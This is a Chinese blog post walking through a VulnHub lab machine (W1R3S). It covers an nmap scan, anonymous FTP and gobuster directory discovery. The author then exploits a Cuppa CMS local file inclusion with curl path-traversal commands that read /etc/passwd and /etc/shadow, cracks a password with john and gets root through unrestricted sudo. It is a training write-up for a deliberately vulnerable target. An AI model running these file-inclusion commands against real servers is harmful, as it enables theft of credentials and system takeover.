vulnhub靶机实战——W1R3S

环境

 

靶机ip:192.168.163.132

攻击机ip:192.168.163.129

目的:拿下靶机并获得root权限

 

渗透

首先nmap扫描端口

nmap -sC -sV 192.168.163.132

可看到靶机开启了ftp端口21,ssh端口22,http端口80,mysql端口3306。

首先看到了21端口的ftp允许匿名登陆,于是登陆ftp服务器找有没有可利用的文件。

各种文件夹翻了一遍并没有什么东西,找的时候发现两串hash,解密hash内容一个是这不是密码,另一个是告诉我们没有这么简单(心疼解密时花的一块钱),放弃ftp

访问80,是apache的默认页面,没什么发现。

使用gobuster扫目录

这个时候我们发现了两个有趣的目录

/wordpress和/administrator

访问了wordpress,也是没什么东西。

于是访问/administrator,发现cms是cuppa

 果断找这个cms的漏洞,只有一个先下载下来看看

看到这个cms存在lfi漏洞,根据txt中的内容进行构造url

http://192.168.163.132/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

在浏览器中输入上面的URL,页面没有任何返回。
尝试使用curl命令,对参数urlconfig的参数进行urlencode
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.163.132/administrator/alerts/alertConfigField.php 
成功显示,修改命令为
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow  http://192.168.163.132/administrator/alerts/alertConfigField.php

把有密码的几个用户信息全部复制下来,放入pass.txt中

john pass.txt解出一个w1r3s的密码,ssh登陆

尝试root

命令行输入sudo -l(此处因为比较简单所以懒得截图了,凑活看吧)

w1r3s@W1R3S:~$ sudo -l
sudo: unable to resolve host W1R3S
[sudo] password for w1r3s: 
Matching Defaults entries for w1r3s on W1R3S:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User w1r3s may run the following commands on W1R3S:
    (ALL : ALL) ALL

 

这时我们看到,w1r3s用户可运行任何命令

sudo su即可切换到root

 ps:靶机比较简单,写这个文章只是为了记录一下,仅此而已。

转载于:https://www.cnblogs.com/Aasion/p/10859018.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值